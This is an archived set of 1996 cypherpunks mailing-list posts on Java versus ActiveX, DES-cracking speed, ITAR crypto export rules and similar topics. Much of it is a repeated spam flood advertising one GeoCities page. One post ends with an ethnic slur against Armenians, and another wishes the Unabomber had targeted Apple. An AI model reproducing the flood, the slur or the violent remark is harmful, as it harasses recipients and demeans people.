s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:18:22 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150217.VAA07715@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:16:28 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07718@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:16:42 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07721@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:16:49 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07724@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:16:56 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07727@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:17:02 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07731@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:17:12 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07734@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 22:17:19 -0800 (PST)
To: <Admin@bexcol.demon.co.uk>
Subject: www.geocities.com/SiliconValley/Heights/2608
Message-ID: <199612150218.VAA07738@cps1.starwell.com>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.co
m/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/H
eights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.
geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/Sil
iconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Height
s/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geoci
ties.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconV
alley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/260
8www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.c
om/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/
Heights/2608www.geocities.com/SiliconValley/Heights/2608www.geocities.com/SiliconValley/Heights/2608




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 18:40:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961214181659.29415A-100000@beast.brainlink.com>
Message-ID: <2RHyyD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> > > While ActiveX does support hand optmized assembler, there are Java
> > > JustInTime compilers which take JVM bytecodes and turn'em into raw
> > > assembler.  They aren't hand optimized, they are natively compiled code,
> > > but they are native code non the less.  A good optimizing compiler may
> >
> > I've seen many Forth implementations, including pseudo-compilers similar
> > to what you describe. They sure generated a lot of instructions and an
> > occasional speed improvement over a simple-minded interpreter.
>
> Forth!=Java.  Test it before you speak.

Forth is close enough to Java to suffer from the same problem: the hacks you
describe don't know when they look at your bytecode what a C compiler knows
when it looks at a C program. They emit native machine language instructions
that emulate the Java machine at run time and repeatedly resolve the
references that a C compiler has resolved once at compile time.

<a bunch of nonsense skipped>

> > Of course, Ray works for Earthweb, who has a "special partnership" with
> > SunSoft, and gets paid to badmouth competing products and push Java when
> > it's clearly inappropriate.
>
> Or maybe Ray knows what he's talking about BECAUSE of that same
> implication. :)  As for inappropriate, ActiveX is inappropriate for most
> uses - any web page attachable code that when downloaded and executed can
> format your hard drive is inappropriate.  Regardless of performance.
>
> Until Microsoft secures ActiveX in it's own sandbox and doesn't allow it
> to access things it shouldn't, it's not cool.
>
> Anyhow, I will drop this topic here since it's becoming an ActiveX vs
> Java religious crusade and is inappropriate.

The great Russian-Scottish poet Mikhail Yur'evich Lermotov said the following
about the likes of Ray "Arsen" Arachelian:  "Ty trus, ty rab, ry armyanin."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 22:04:27 -0800 (PST)
To: trei@process.com
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
In-Reply-To: <199612131459.GAA06660@cygnus.com>
Message-ID: <32B38C8E.484C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
> Ray Arachelian <sunder@brainlink.com> wrote:
> > On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:[snip]
> For this test, I modified the code to cut out the delays associated
> with incrementing the key schedule, leaving the most of the
> crunching in the DES decryption. Both versions were compiled
> under Visual C++ 4.0, with Optimizations set to 'Maximize speed',
> and inlines to 'any suitable', and run on a 90MHz Digital
> Celebris 590 under WinNT 3.51.
> Averaging several runs:
> "C":   102,300 crypts/sec
> ASM:   238,000 crypts/sec

I remember sitting down with some ASM programmers in the mid 1980's
(using x86 PCs), and at that time, looking at the Codeview tracings,
it occurred to me that ASM would nearly always run 2x faster than 'C',
something that is inherent in the processes.

Someone on this list should know if it is possible to maximize speed in
a typical 'C' routine, using Register variables (particularly for loops),
inlining everything possible, etc., to get executable code much closer
than a factor of 2x difference.  Can it be done on a PC, and how hard
would it be to explain, to cover a representative variety of techniques?

[snip remainder]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 14 Dec 1996 18:45:58 -0800 (PST)
To: trei@process.com
Subject: Re: ITAR -> EAR; loss of First Amendment Rights.
In-Reply-To: <199612131951.LAA03511@toad.com>
Message-ID: <199612150243.VAA09651@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Peter Trei" writes:

: It appears that we will now have the unique
: situation that a book which contains cryptographic
: info or source code will be illegal to export or 
: sell to a non-citizen, without getting export permission.
: 
: I am not aware of any prior time when the government
: attempted to claim that printed material, freely
: available in bookstores and newsstands to US citizens,
: became contraband when sold or given to a non-citizen.

A literal reading of the ITAR's provisions relating to cryptography
leads to exactly that result.  And there have been strong suggestions
that that is the intended result in some of the statements made by
representatives of the State Department.  

If you are interested in this you might look into MIT's experiences
when they published the book with the PGP source code.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 22:05:00 -0800 (PST)
To: Rob Carlson <robc@xmission.com>
Subject: Re: In Defense of Anecdotal Evidence
In-Reply-To: <199612131649.JAA24217@mail.xmission.com>
Message-ID: <32B3923E.6268@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Rob Carlson wrote:
> On Thu, 12 Dec 1996 14:12:23 -0800, Huge Cajones Remailer wrote:
> >Statistics are a useful tool, but they have their problems.  Their
> >accuracy is often in doubt.  Most scientific data comes with an error
> >analysis so you can tell what the figure means.  For some reason
> >statisticians never do this so we cannot tell whether their numbers
> >are accurate to within 0.1%, 1.0%, 10%, or even worse.[snip]
> Of course, anecdotal evidence also suffers from all of these problems. And
> in greater magnitude. This is true since it is a special case of statistical
> evidence. With a non-random sample set of one and no controls for observer bias.
> Humans are poor observers. The data processing unit is easily fooled. Many
> people make a living off of this fallability such as magicians and politicians.
> This doesn't make studies or statistical evidence true. Just more reliable than
> anecdotal evidence.

Yes and no.  Depends on the objective. If I had to purchase and install
a new server for my employer, and not being an expert in security myself,
I would (barring having a very trusted friend for advice) certainly be
inclined to trust the published reports more than anecdotes, even when
the anecdotes come from erstwhile reputable posters on these lists.

OTOH, if I were about to hire an employee to do that very job (and other
similar jobs as time goes on), I would be much more inclined to trust my
instincts, my perceptions during the interview(s), and specific data
handcarried in by the prospective hiree than any published statistics
or recommendations in hiring methodology that are generally used in
large-corporation hiring.

Perhaps even this last paragraph wouldn't apply if I were a large-corpor-
ation personnel recruiter, since in that case I'd not only be further
removed from the IS dept., but I'd be representing people with agendas
that aren't necessarily similar to what I deal with in the small company
I work in now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 14 Dec 1996 18:57:09 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: ITARs effects
In-Reply-To: <199612150010.TAA02707@homeport.org>
Message-ID: <199612150254.VAA09810@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

: Peter D. Junger wrote:
: | 
: | : This implies that putting something up for FTP == export. Holy
: | : shit.
: | 
: | That has always been the position of the Department of Defense Trade
: | Controls with respect to the ITAR, the only difference is that now
: | it is going to be in writing.
: 
: 	My understanding is that they choose not to continue
: per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
: a change.  Or did Phil not put the code up for FTP?

Phil probably did not put up the code, but that is not the point.
They held his feet over the fire for three years and then, as the
statute of limitations ran out, dropped the case---perhaps because
they could not prove that Phil made the code available, perhaps
because they did not want to subject their position to judicial
review, probably for a combination of those reasons.  But that in no
way amounted to a change in what they claim.  In my case the
government's lawyer has made it quite clear that they would consider
putting cryptographic software on a web site as a violation, and I
don't think that for this purpose there is any distinction either in
the government's mind or in reality between an FTP site and a web
site.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 22:22:00 -0800 (PST)
To: Steve Schear <azur@netcom.com>
Subject: Re: Secure Erase for PCs?
In-Reply-To: <v02140b03aed91c4a7cb3@[10.0.2.15]>
Message-ID: <32B39864.608E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:
> >Steve Schear wrote:[snip]
> >I've been watching for a lot of years, and I'm sick of those bastards
> >at Apple.  Those scumbags not only make a flimsy and unreliable computer,
> >they won't repair the machine either.  Too bad Ted Kazynski(sp?) didn't
> >have a grudge against Apple, the scumbag creeps.

> I'm sorry your ownership experience hasn't been pleasant.  I've owned six
> and installed a hundred or so as a consultant (along with many Wintel
> systems) with great reliability.  Only one of the machines I know of has
> needed service, and this because it was operated in a dirty shop-floor
> environment w/o an enclosure or even periodic internal cleaning.  Since
> I've not had to have one repaired under warranty I can't vouch for their
> committment to good service.  I'm puzzeled at your reaction.

I hope you don't mind my adding this to the list, but since I posted
something very pertinent several days ago and got *no* reaction, and
since it was something very significant, I wanna try it one more time:

This experience on your part, of installing 100-plus Macs with only one
needing service, is beyond amazing.  Most computer people will readily
admit that HP (for example) is the best, reliability-wise, yet I have
purchased quite a few of their computers and major peripherals over the
past 20 years, and I have experienced an approximate 40% (!) defective
rate during the one-year warranty period, more than 30% falling within
the first three months.

As to why I still use their stuff - it's because the others are worse,
a fact which is almost universally agreed on.  How can this possibly
be, you ask?  Could it be really bad luck?  No. Could it be mishandling?
No.  For a reality check, another famed electronics vendor, Sony, has
the same problem, but even worse than HP.  Unfortunately, in the Sony
case, their products don't wear well after fixing, excepting a couple
of their rather expensive "professional" series products.

I suspect that the 100-plus Apple owners don't really use the machines,
otherwise, if they were so reliable, why does Apple desperately avoid
repairing their own products, when HP has provided top-level professional
technicians (not boys in dusty back rooms of cheap-ass computer stores)
to fix their products, and done so consistently ever since the beginning
of the PC business in 1966?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 14 Dec 1996 22:20:30 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [No joke] The Feds may legally gas us
Message-ID: <3.0.32.19961214221317.00683ea0@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:09 PM 12/14/96 +0000, The Deviant wrote:
>True, but the point still stands -- They can't, legally.

I am not certain that the chemical weapons prohibitions apply to a
country's own civilians. IANAL.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Dec 1996 22:32:25 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <3.0.32.19961214221317.00683ea0@netcom14.netcom.com>
Message-ID: <32B39AA6.58@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> At 06:09 PM 12/14/96 +0000, The Deviant wrote:
> >True, but the point still stands -- They can't, legally.

> I am not certain that the chemical weapons prohibitions apply to a
> country's own civilians. IANAL.

This is the point that Janet Reno tried to make in front of Congress,
that the international accords don't apply internally. While it seemed
that some of the representatives or senators were aghast at this, I
don't recall any significant rebuttal to her position.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:41 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02065@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:34:58 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02069@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:02 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02074@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:14 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02080@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:17 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02084@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:21 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150433.WAA02094@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:25 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02099@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:37:12 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02105@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:28 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02109@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:39 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02114@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:50 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02127@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:35:59 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02130@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:39:38 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02134@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:07 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
